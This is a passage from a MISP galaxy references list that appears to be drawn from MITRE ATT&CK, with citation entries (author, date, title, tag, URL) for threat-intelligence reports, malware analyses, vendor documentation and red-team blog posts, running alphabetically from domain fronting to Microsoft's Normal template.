David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.

The tag is: misp-galaxy:references="Fifield Blocking Resistent Communication through domain fronting 2015"

Table 12903. Table References

Links

http://www.icir.org/vern/papers/meek-PETS-2015.pdf

GitHub Bloodhound

Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="GitHub Bloodhound"

Table 12904. Table References

Links

https://github.com/BloodHoundAD/BloodHound

Blue Cloud of Death Video

Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.

The tag is: misp-galaxy:references="Blue Cloud of Death Video"

Table 12905. Table References

Links

https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815

Blue Cloud of Death

Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.

The tag is: misp-galaxy:references="Blue Cloud of Death"

Table 12906. Table References

Links

https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1

apple doco bonjour description

Apple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021.

The tag is: misp-galaxy:references="apple doco bonjour description"

Table 12907. Table References

Links

https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html

Booby Trap Shortcut 2017

Weyne, F. (2017, April). Booby trap a shortcut with a backdoor. Retrieved October 3, 2023.

The tag is: misp-galaxy:references="Booby Trap Shortcut 2017"

Table 12908. Table References

Links

https://www.uperesia.com/booby-trapped-shortcut

Microsoft Bootcfg

Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.

The tag is: misp-galaxy:references="Microsoft Bootcfg"

Table 12909. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg

Imperva DDoS for Hire

Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020.

The tag is: misp-galaxy:references="Imperva DDoS for Hire"

Table 12910. Table References

Links

https://www.imperva.com/learn/ddos/booters-stressers-ddosers/

Wikipedia Booting

Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.

The tag is: misp-galaxy:references="Wikipedia Booting"

Table 12911. Table References

Links

https://en.wikipedia.org/wiki/Booting

FireEye BOOTRASH SANS

Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020.

The tag is: misp-galaxy:references="FireEye BOOTRASH SANS"

Table 12912. Table References

Links

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf

Unit42 LockerGoga 2019

Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Unit42 LockerGoga 2019"

Table 12913. Table References

Links

https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/

Threatexpress MetaTwin 2017

Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019.

The tag is: misp-galaxy:references="Threatexpress MetaTwin 2017"

Table 12914. Table References

Links

https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/

Sandfly BPFDoor 2022

The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="Sandfly BPFDoor 2022"

Table 12915. Table References

Links

https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

AADInternals - BPRT

Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="AADInternals - BPRT"

Table 12916. Table References

Links

https://o365blog.com/post/bprt/

Brazking-Websockets

Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.

The tag is: misp-galaxy:references="Brazking-Websockets"

Table 12917. Table References

Links

https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/

MSTIC Nobelium Toolset May 2021

MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="MSTIC Nobelium Toolset May 2021"

Table 12918. Table References

Links

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

Lee 2013

Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.

The tag is: misp-galaxy:references="Lee 2013"

Table 12919. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

sentinelone-malvertising

Hegel, Tom. (2023, January 19). Breaking Down the SEO Poisoning Attack | How Attackers Are Hijacking Search Results. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="sentinelone-malvertising"

Table 12920. Table References

Links

https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/

OS X Keychain

Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017.

The tag is: misp-galaxy:references="OS X Keychain"

Table 12921. Table References

Links

http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain

Brown Exploiting Linkers

Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Brown Exploiting Linkers"

Table 12922. Table References

Links

http://www.nth-dimension.org.uk/pub/BTL.pdf

FireEye Outlook Dec 2019

McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.

The tag is: misp-galaxy:references="FireEye Outlook Dec 2019"

Table 12923. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html

Cisco Talos Blog December 08 2022

Cisco Talos Blog. (2022, December 8). Breaking the silence - Recent Truebot activity. Retrieved May 8, 2023.

The tag is: misp-galaxy:references="Cisco Talos Blog December 08 2022"

Table 12924. Table References

Links

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

PaloAlto Preventing Opportunistic Attacks Apr 2016

Kiwi. (2016, April 6). Breakout Recap: Cybersecurity Best Practices Part 1 - Preventing Opportunistic Attacks. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="PaloAlto Preventing Opportunistic Attacks Apr 2016"

Table 12925. Table References

Links

https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913

Mandiant BYOL 2018

Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021.

The tag is: misp-galaxy:references="Mandiant BYOL 2018"

Table 12926. Table References

Links

https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique

Mandiant BYOL

Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Mandiant BYOL"

Table 12927. Table References

Links

https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique

Comparitech Leak

Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Comparitech Leak"

Table 12928. Table References

Links

https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/

ThreatPost Broadvoice Leak

Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="ThreatPost Broadvoice Leak"

Table 12929. Table References

Links

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

Secureworks BRONZE BUTLER Oct 2017

Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.

The tag is: misp-galaxy:references="Secureworks BRONZE BUTLER Oct 2017"

Table 12930. Table References

Links

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

Secureworks BRONZE HUNTLEY

Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.

The tag is: misp-galaxy:references="Secureworks BRONZE HUNTLEY"

Table 12931. Table References

Links

https://www.secureworks.com/research/threat-profiles/bronze-huntley

Secureworks BRONZE PRESIDENT December 2019

Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Secureworks BRONZE PRESIDENT December 2019"

Table 12932. Table References

Links

https://www.secureworks.com/research/bronze-president-targets-ngos

SecureWorks BRONZE UNION June 2017

Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="SecureWorks BRONZE UNION June 2017"

Table 12933. Table References

Links

https://www.secureworks.com/research/bronze-union

Wikipedia Browser Extension

Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.

The tag is: misp-galaxy:references="Wikipedia Browser Extension"

Table 12934. Table References

Links

https://en.wikipedia.org/wiki/Browser_extension

Mr. D0x BitB 2022

mr.d0x. (2022, March 15). Browser In The Browser (BITB) Attack. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Mr. D0x BitB 2022"

Table 12935. Table References

Links

https://mrd0x.com/browser-in-the-browser-phishing-attack/

Cobalt Strike Browser Pivot

Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.

The tag is: misp-galaxy:references="Cobalt Strike Browser Pivot"

Table 12936. Table References

Links

https://www.cobaltstrike.com/help-browser-pivoting

Symantec Buckeye

Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Symantec Buckeye"

Table 12937. Table References

Links

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

ESET Buhtrap and Buran April 2019

ESET Research. (2019, April 30). Buhtrap backdoor and Buran ransomware distributed via major advertising platform. Retrieved May 11, 2020.

The tag is: misp-galaxy:references="ESET Buhtrap and Buran April 2019"

Table 12938. Table References

Links

https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/

S1 Custom Shellcode Tool

Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="S1 Custom Shellcode Tool"

Table 12939. Table References

Links

https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/

Data Driven Security DGA

Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Data Driven Security DGA"

Table 12940. Table References

Links

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

CTD PPID Spoofing Macro Mar 2019

Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.

The tag is: misp-galaxy:references="CTD PPID Spoofing Macro Mar 2019"

Table 12941. Table References

Links

https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/

Cybereason Bumblebee August 2022

Cybereason. (2022, August 17). Bumblebee Loader – The High Road to Enterprise Domain Control. Retrieved August 29, 2022.

The tag is: misp-galaxy:references="Cybereason Bumblebee August 2022"

Table 12942. Table References

Links

https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

Symantec Bumblebee June 2022

Kamble, V. (2022, June 28). Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-crime Ecosystem. Retrieved August 24, 2022.

The tag is: misp-galaxy:references="Symantec Bumblebee June 2022"

Table 12943. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

objsee netwire backdoor 2019

Patrick Wardle. (2019, June 20). Burned by Fire(fox). Retrieved October 1, 2021.

The tag is: misp-galaxy:references="objsee netwire backdoor 2019"

Table 12944. Table References

Links

https://objective-see.com/blog/blog_0x44.html

401 TRG Winnti Umbrella May 2018

Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.

The tag is: misp-galaxy:references="401 TRG Winnti Umbrella May 2018"

Table 12945. Table References

Links

https://401trg.github.io/pages/burning-umbrella.html

Bypassing Gatekeeper

Thomas Reed. (2016, March 31). Bypassing Apple’s Gatekeeper. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Bypassing Gatekeeper"

Table 12946. Table References

Links

https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/

engima0x3 DNX Bypass

Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.

The tag is: misp-galaxy:references="engima0x3 DNX Bypass"

Table 12947. Table References

Links

https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

engima0x3 RCSI Bypass

Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.

The tag is: misp-galaxy:references="engima0x3 RCSI Bypass"

Table 12948. Table References

Links

https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

Exploit Monday WinDbg

Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017.

The tag is: misp-galaxy:references="Exploit Monday WinDbg"

Table 12949. Table References

Links

http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

SubTee MSBuild

Smith, C. (2016, September 13). Bypassing Application Whitelisting using MSBuild.exe - Device Guard Example and Mitigations. Retrieved September 13, 2016.

The tag is: misp-galaxy:references="SubTee MSBuild"

Bypassing CloudTrail in AWS Service Catalog

Nick Frichette. (2023, March 20). Bypassing CloudTrail in AWS Service Catalog, and Other Logging Research. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="Bypassing CloudTrail in AWS Service Catalog"

Table 12950. Table References

Links

https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/

AADInternals - Conditional Access Bypass

Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="AADInternals - Conditional Access Bypass"

Table 12951. Table References

Links

https://o365blog.com/post/mdm

MsitPros CHM Aug 2017

Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="MsitPros CHM Aug 2017"

Table 12952. Table References

Links

https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

enigma0x3 sdclt app paths

Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.

The tag is: misp-galaxy:references="enigma0x3 sdclt app paths"

Table 12953. Table References

Links

https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

MDSec System Calls

MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="MDSec System Calls"

Table 12954. Table References

Links

https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/

Hybrid Analysis Icacls1 June 2018

Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.

The tag is: misp-galaxy:references="Hybrid Analysis Icacls1 June 2018"

Table 12955. Table References

Links

https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100

Microsoft Credential Manager store

Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020.

The tag is: misp-galaxy:references="Microsoft Credential Manager store"

Table 12956. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store

Microsoft - Cached Creds

Microsoft. (2016, August 21). Cached and Stored Credentials Technical Overview. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Microsoft - Cached Creds"

Table 12957. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)

Kaspersky CactusPete Aug 2020

Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.

The tag is: misp-galaxy:references="Kaspersky CactusPete Aug 2020"

Table 12958. Table References

Links

https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/

ESET CaddyWiper March 2022

ESET. (2022, March 15). CaddyWiper: New wiper malware discovered in Ukraine. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="ESET CaddyWiper March 2022"

Table 12959. Table References

Links

https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine

Cadet Blizzard emerges as novel threat actor

Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="Cadet Blizzard emerges as novel threat actor"

Table 12960. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

Cado Security Denonia

Matt Muir. (2022, April 6). Cado Discovers Denonia: The First Malware Specifically Targeting Lambda. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Cado Security Denonia"

Table 12961. Table References

Links

https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/

Caesars Scattered Spider September 13 2023

William Turton. (2023, September 13). Caesars Entertainment Paid Millions to Hackers in Attack. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Caesars Scattered Spider September 13 2023"

Table 12962. Table References

Links

https://www.bloomberg.com/news/articles/2023-09-13/caesars-entertainment-paid-millions-in-ransom-in-recent-attack

Securelist Calisto July 2018

Kuzin, M., Zelensky S. (2018, July 20). Calisto Trojan for macOS. Retrieved September 7, 2018.

The tag is: misp-galaxy:references="Securelist Calisto July 2018"

Table 12963. Table References

Links

https://securelist.com/calisto-trojan-for-macos/86543/

CERTFR-2023-CTI-009

CERT-FR. (2023, October 26). Campagnes d’attaques du mode opératoire APT28 depuis 2021. Retrieved October 26, 2023.

The tag is: misp-galaxy:references="CERTFR-2023-CTI-009"

Table 12964. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

FSI Andariel Campaign Rifle July 2017

FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="FSI Andariel Campaign Rifle July 2017"

Table 12965. Table References

Links

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do

KasperskyCarbanak

Kaspersky Lab’s Global Research & Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved March 27, 2017.

The tag is: misp-galaxy:references="KasperskyCarbanak"

Table 12966. Table References

Links

https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/

Kaspersky Carbanak

Kaspersky Lab’s Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.

The tag is: misp-galaxy:references="Kaspersky Carbanak"

Table 12967. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf

Forcepoint Carbanak Google C2

Griffin, N. (2017, January 17). CARBANAK GROUP USES GOOGLE FOR MALWARE COMMAND-AND-CONTROL. Retrieved February 15, 2017.

The tag is: misp-galaxy:references="Forcepoint Carbanak Google C2"

Table 12968. Table References

Links

https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-command-and-control

Trend Micro Carberp February 2014

Trend Micro. (2014, February 27). CARBERP. Retrieved July 29, 2020.

The tag is: misp-galaxy:references="Trend Micro Carberp February 2014"

Table 12969. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/carberp

Prevx Carberp March 2011

Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.

The tag is: misp-galaxy:references="Prevx Carberp March 2011"

Table 12970. Table References

Links

http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf

Trusteer Carberp October 2010

Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020.

The tag is: misp-galaxy:references="Trusteer Carberp October 2010"

Table 12971. Table References

Links

https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf

ESET Carbon Mar 2017

ESET. (2017, March 30). Carbon Paper: Peering into Turla’s second stage backdoor. Retrieved November 7, 2018.

The tag is: misp-galaxy:references="ESET Carbon Mar 2017"

Table 12972. Table References

Links

https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/

CrowdStrike Carbon Spider August 2021

Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="CrowdStrike Carbon Spider August 2021"

Table 12973. Table References

Links

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

PaloAlto CardinalRat Apr 2017

Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.

The tag is: misp-galaxy:references="PaloAlto CardinalRat Apr 2017"

Table 12974. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/

ESET Casbaneiro Oct 2019

ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="ESET Casbaneiro Oct 2019"

Table 12975. Table References

Links

https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/

Microsoft Catalog Files and Signatures April 2017

Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft Catalog Files and Signatures April 2017"

Table 12976. Table References

Links

https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files

Catch All Chrome Extension

Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Catch All Chrome Extension"

Table 12977. Table References

Links

https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)

Akamai JS

Katz, O. (2020, October 26). Catch Me if You Can—JavaScript Obfuscation. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Akamai JS"

Table 12978. Table References

Links

https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation

Categorisation_not_boundary

MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.

The tag is: misp-galaxy:references="Categorisation_not_boundary"

Table 12979. Table References

Links

https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/

CrowdStrike Flying Kitten

Dahl, M.. (2014, May 13). Cat Scratch Fever: CrowdStrike Tracks Newly Reported Iranian Actor as FLYING KITTEN. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="CrowdStrike Flying Kitten"

Table 12980. Table References

Links

https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/

Telephone Attack Delivery

Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.

The tag is: misp-galaxy:references="Telephone Attack Delivery"

Table 12981. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery

Tetra Defense Sodinokibi March 2020

Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.

The tag is: misp-galaxy:references="Tetra Defense Sodinokibi March 2020"

Table 12982. Table References

Links

https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis

CarbonBlack RobbinHood May 2019

Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.

The tag is: misp-galaxy:references="CarbonBlack RobbinHood May 2019"

Table 12983. Table References

Links

https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/

Talos CCleanup 2017

Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.

The tag is: misp-galaxy:references="Talos CCleanup 2017"

Table 12984. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

Cdb.exe - LOLBAS Project

LOLBAS. (2018, May 25). Cdb.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cdb.exe - LOLBAS Project"

Table 12985. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/

ESET PLEAD Malware July 2018

Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech‑companies misused in Plead malware campaign. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="ESET PLEAD Malware July 2018"

Table 12986. Table References

Links

https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/

Medium Certified Pre Owned

Schroeder, W. (2021, June 17). Certified Pre-Owned. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="Medium Certified Pre Owned"

Table 12987. Table References

Links

https://posts.specterops.io/certified-pre-owned-d95910965cd2

SpecterOps Certified Pre Owned

Schroeder, W. & Christensen, L. (2021, June 22). Certified Pre-Owned - Abusing Active Directory Certificate Services. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="SpecterOps Certified Pre Owned"

Table 12988. Table References

Links

https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf

GitHub Certify

HarmJ0y et al. (2021, June 9). Certify. Retrieved August 4, 2022.

The tag is: misp-galaxy:references="GitHub Certify"

Table 12989. Table References

Links

https://github.com/GhostPack/Certify/

CertOC.exe - LOLBAS Project

LOLBAS. (2021, October 7). CertOC.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CertOC.exe - LOLBAS Project"

Table 12990. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

CertReq.exe - LOLBAS Project

LOLBAS. (2020, July 7). CertReq.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CertReq.exe - LOLBAS Project"

Table 12991. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certreq/

GitHub CertStealer

TheWover. (2021, April 21). CertStealer. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="GitHub CertStealer"

Table 12992. Table References

Links

https://github.com/TheWover/CertStealer

TechNet Certutil

Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="TechNet Certutil"

Table 12993. Table References

Links

https://technet.microsoft.com/library/cc732443.aspx

LOLBAS Certutil

LOLBAS. (n.d.). Certutil.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Certutil"

Table 12994. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

FireEye CFR Watering Hole 2012

Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="FireEye CFR Watering Hole 2012"

Table 12995. Table References

Links

https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html

Twitter Cglyer Status Update APT3 eml

Glyer, C. (2018, April 14). @cglyer Status Update. Retrieved October 11, 2018.

The tag is: misp-galaxy:references="Twitter Cglyer Status Update APT3 eml"

Table 12996. Table References

Links

https://twitter.com/cglyer/status/985311489782374400

Cybereason Chaes Nov 2020

Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.

The tag is: misp-galaxy:references="Cybereason Chaes Nov 2020"

Table 12997. Table References

Links

https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf

Symantec Chafer February 2018

Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020.

The tag is: misp-galaxy:references="Symantec Chafer February 2018"

Table 12998. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

Securelist Remexi Jan 2019

Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Securelist Remexi Jan 2019"

Table 12999. Table References

Links

https://securelist.com/chafer-used-remexi-malware/89538/

change_rdp_port_conti

The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks. Retrieved March 1, 2022.

The tag is: misp-galaxy:references="change_rdp_port_conti"

Table 13000. Table References

Links

https://twitter.com/TheDFIRReport/status/1498657772254240768

Microsoft Change Normal Template

Microsoft. (n.d.). Change the Normal template (Normal.dotm). Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Microsoft Change Normal Template"

Table 13001. Table References

Links

